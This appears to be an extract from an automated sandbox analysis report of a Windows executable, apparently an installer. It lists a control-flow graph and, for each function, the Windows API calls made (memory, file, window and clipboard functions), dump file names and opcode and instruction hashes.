                                                                          control_flow_graph 813 407ac3-407ac7 814 407ac9-407bba 813->814 815 407ade-407ae4 813->815 825 407be7-407beb 814->825 817 407aeb-407aff 815->817 818 407b01-407b17 817->818 819 407b19-407b2c 817->819 822 407b33-407b3a 818->822 819->822 823 407b61-407b64 822->823 824 407b3c-407b40 822->824 828 407c65-407c68 823->828 826 407b46-407b5e 824->826 827 407ccd-407cd4 824->827 829 407c4a-407c5d 825->829 830 407bed-407c0c 825->830 826->823 831 407cdd-407cea 827->831 837 407350 828->837 838 407cec 828->838 829->828 833 407c25-407c39 830->833 834 407c0e-407c23 830->834 836 407cef-407cf6 831->836 835 407c3c-407c43 833->835 834->835 844 407be1-407be4 835->844 845 407c45 835->845 839 407357-40735b 837->839 840 40749b-4074b6 837->840 841 40746d-407471 837->841 842 4073ff-407403 837->842 838->836 839->831 846 407361-40736e 839->846 840->817 847 407c76-407c7d 841->847 848 407477-40748b 841->848 850 407409-407420 842->850 851 407c6d-407c74 842->851 844->825 852 407cd6 845->852 853 407bc6-407bde 845->853 846->838 854 407374-4073ba 846->854 847->831 855 40748e-407496 848->855 856 407423-407427 850->856 851->831 852->831 853->844 858 4073e2-4073e4 854->858 859 4073bc-4073c0 854->859 855->841 860 407498 855->860 856->842 857 407429-40742f 856->857 861 407431-407438 857->861 862 407459-40746b 857->862 865 4073f5-4073fd 858->865 866 4073e6-4073f3 858->866 863 4073c2-4073c5 GlobalFree 859->863 864 4073cb-4073d9 GlobalAlloc 859->864 860->840 867 407443-407453 GlobalAlloc 861->867 868 40743a-40743d GlobalFree 861->868 862->855 863->864 864->838 869 4073df 864->869 865->856 866->865 866->866 867->838 867->862 868->867 869->858
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                          Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                          Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                          Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                          • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                          • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                          • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                          Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                          • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                          • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                          • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                          Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 3394109436-0
                                                                          • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                          • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                          • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                          • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                          Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                          • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                          • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                          • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                          Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate
                                                                          • String ID:
                                                                          • API String ID: 415043291-0
                                                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                          Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                          • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                          • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                          Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                          Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                          • String ID:
                                                                          • API String ID: 4115351271-0
                                                                          • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                          • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                          • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                          • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                          Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

                                                                          Non-executed Functions

                                                                          Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                          • GetClientRect.USER32(?,?), ref: 00405196
                                                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                          • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                          • ShowWindow.USER32(00000008), ref: 00405333
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                          • CreatePopupMenu.USER32 ref: 00405376
                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                          • EmptyClipboard.USER32 ref: 00405411
                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                          • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                          • CloseClipboard.USER32 ref: 0040546E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                          • String ID: @rD$New install of "%s" to "%s"${
                                                                          • API String ID: 2110491804-2409696222
                                                                          • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                          • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                          Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                          • DeleteObject.GDI32(?), ref: 00404A79
                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
